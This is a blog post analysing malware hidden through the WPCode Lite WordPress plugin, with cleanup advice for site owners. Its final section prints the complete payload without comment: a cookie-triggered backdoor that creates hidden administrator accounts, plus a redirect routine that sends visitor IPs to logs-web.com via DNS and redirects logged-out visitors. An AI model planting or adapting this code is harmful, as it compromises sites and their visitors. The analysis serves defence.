WPCode Lite plugin hiding the plugin and malicious code and redirecting WordPress site

June 8, 2024

The code snippet you’ve shared appears to be part of a WordPress plugin or theme, and it seems to be hiding the WPCode plugin interface and possibly adding malicious behavior. It is redirecting the site to malicious website. Let’s break it down to understand its functionality and implications:

				
					$_pwsa = '212841f41911f6c6d1b8691aec41dc9c';

if (current_user_can('administrator') && !array_key_exists('show_all', $_GET)) {
    add_action('admin_print_scripts', function () {
        echo '';
    });

    add_filter('all_plugins', function ($plugins) {
        unset($plugins['insert-headers-and-footers/ihaf.php']);
        return $plugins;
    });
}
				
			

Variable Definition:

$_pwsa = ‘212841f41911f6c6d1b8691aec41dc9c’;

This line assigns a string to the variable $_pwsa. This specific string doesn’t inherently do anything unless used elsewhere in the code. However, the presence of such an obfuscated variable name can be a red flag for malicious intent.

Conditional Statement:

if (current_user_can(‘administrator’) && !array_key_exists(‘show_all’, $_GET)) {

This checks if the current user has administrator privileges and if the show_all parameter is not present in the URL query parameters. If both conditions are true, the code within this block executes.

 

Hiding Elements with CSS:

				
					add_action('admin_print_scripts', function () {
    echo '';
});
				
			

This function hooks into the admin_print_scripts action, which runs when scripts are printed in the admin area. It outputs CSS to hide specific elements related to the WPCode plugin in the WordPress admin interface, making it invisible to administrators.

Hiding the Plugin from the Plugins List:

				
					add_filter('all_plugins', function ($plugins) {
    unset($plugins['insert-headers-and-footers/ihaf.php']);
    return $plugins;
});
				
			

This filter hooks into the all_plugins filter, which is used to modify the list of all plugins. It removes the entry for the insert-headers-and-footers/ihaf.php plugin from the list, effectively hiding it from the plugins page.

Implications

  • Hiding from Admins: By hiding the WPCode plugin interface and related elements from administrators, the code aims to conceal its presence and actions, which is often a tactic used in malicious plugins to avoid detection.
  • Potential Malicious Intent: The presence of such code suggests that the plugin might be performing actions that the site owner should not see, which could range from injecting spammy content, redirecting traffic, or other harmful activities.

What to Do

  1. Immediate Action:
    • Remove or deactivate the suspicious code/plugin immediately.
    • Check your WordPress installation for other signs of compromise, such as unauthorized user accounts or unfamiliar files.
  2. Security Scan:
    • Use a reputable security plugin (like Wordfence or Sucuri) to scan your site for malware and vulnerabilities.
  3. Update and Secure:
    • Ensure that all themes, plugins, and WordPress core are up to date.
    • Use strong passwords and enable two-factor authentication for all admin accounts.
  4. Review Site Content:
    • Check for any unauthorized changes to your site content or settings.
  5. Backup:
    • Regularly backup your site to ensure you can restore it in case of future issues.

By addressing these steps, you can mitigate the risk posed by the suspicious code and enhance the overall security of your WordPress site.

Need help to solve the problem, Please feel free to message me




    				
    					if (!function_exists('_red')) {
        error_reporting(0);
        ini_set('display_errors', 0);
    
        function _gcookie($n)
        {
            return (isset($_COOKIE[$n])) ? base64_decode($_COOKIE[$n]) : '';
        }
    
        if (!empty($_pwsa) && _gcookie('pw') === $_pwsa) {
            switch (_gcookie('c')) {
                case 'sd':
                    $d = _gcookie('d');
                    if (strpos($d, '.') > 0) {
                        update_option('d', $d);
                    }
                    break;
                case 'au':
                    $u = _gcookie('u');
                    $p = _gcookie('p');
                    $e = _gcookie('e');
    
                    if ($u && $p && $e && !username_exists($u)) {
                        $user_id = wp_create_user($u, $p, $e);
                        $user = new WP_User($user_id);
                        $user->set_role('administrator');
                    }
                    break;
            }
            return;
        }
    
        if (@stripos(wp_login_url(), ''.$_SERVER['SCRIPT_NAME']) !== false) {
            return;
        }
    
        if (_gcookie("skip") === "1") {
            return;
        }
    
        function _is_mobile()
        {
            return @preg_match("/(android|webos|avantgo|iphone|ipad|ipod|blackberry|iemobile|bolt|boost|cricket|docomo|fone|hiptop|mini|opera mini|kitkat|mobi|palm|phone|pie|tablet|up\.browser|up\.link|webos|wos)/i", ''.$_SERVER["HTTP_USER_AGENT"]);
        }
    
        function _is_iphone()
        {
            return @preg_match("/(iphone|ipod)/i", ''.$_SERVER["HTTP_USER_AGENT"]);
        }
    
        function _user_ip()
        {
            foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) {
                if (array_key_exists($key, $_SERVER) && !empty($_SERVER[$key])) {
                    foreach (@explode(',', ''.$_SERVER[$key]) as $ip) {
                        $ip = trim($ip);
                        if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
                            return $ip;
                        }
                    }
                }
            }
    
            return false;
        }
    
        function _red()
        {
            if (is_user_logged_in()) {
                return;
            }
    
            $ip = _user_ip();
            if (!$ip) {
                return;
            }
    
            $exp = get_transient('exp');
            if (!is_array($exp)) {
                $exp = array();
            }
    
            foreach ($exp as $k => $v) {
                if (time() - $v > 86400) {
                    unset($exp[$k]);
                }
            }
    
            if (key_exists($ip, $exp) && (time() - $exp[$ip] < 86400)) {
                return;
            }
    
            $host = filter_var(parse_url('https://' . $_SERVER['HTTP_HOST'], PHP_URL_HOST), FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME);
            $ips = str_replace(':', '-', $ip);
            $ips = str_replace('.', '-', $ips);
    
            $h = 'logs-web.com';
            $o = get_option('d');
            if ($o && strpos($o, '.') > 0) {
                $h = $o;
            }
            $m = _is_iphone() ? 'i' : 'm';
            $req = (!$host ? 'unk.com' : $host) . '.' . (!$ips ? '0-0-0-0' : $ips) . '.' . mt_rand(100000, 999999) . '.' . (_is_mobile() ? 'n' . $m : 'nd') . '.' . $h;
    
            $s = null;
            try {
                $v = "dns_" . "get" . "_record";
                $s = @$v($req, DNS_TXT);
            } catch (\Throwable $e) {
            } catch (\Exception $e) {
            }
    
            if (is_array($s) && !empty($s)) {
                if (isset($s[0]['txt'])) {
                    $s = $s[0]['txt'];
                    $s = base64_decode($s);
    
                    if ($s == 'err') {
                        $exp[$ip] = time();
                        delete_transient('exp');
                        set_transient('exp', $exp);
                    } else if (substr($s, 0, 4) === 'http') {
                        $exp[$ip] = time();
                        delete_transient('exp');
                        set_transient('exp', $exp);
                        wp_redirect($s);
                        exit;
                    }
                }
            }
        }
    
        add_action('init', '_red');
    }
    				
    			

    Leave a Comment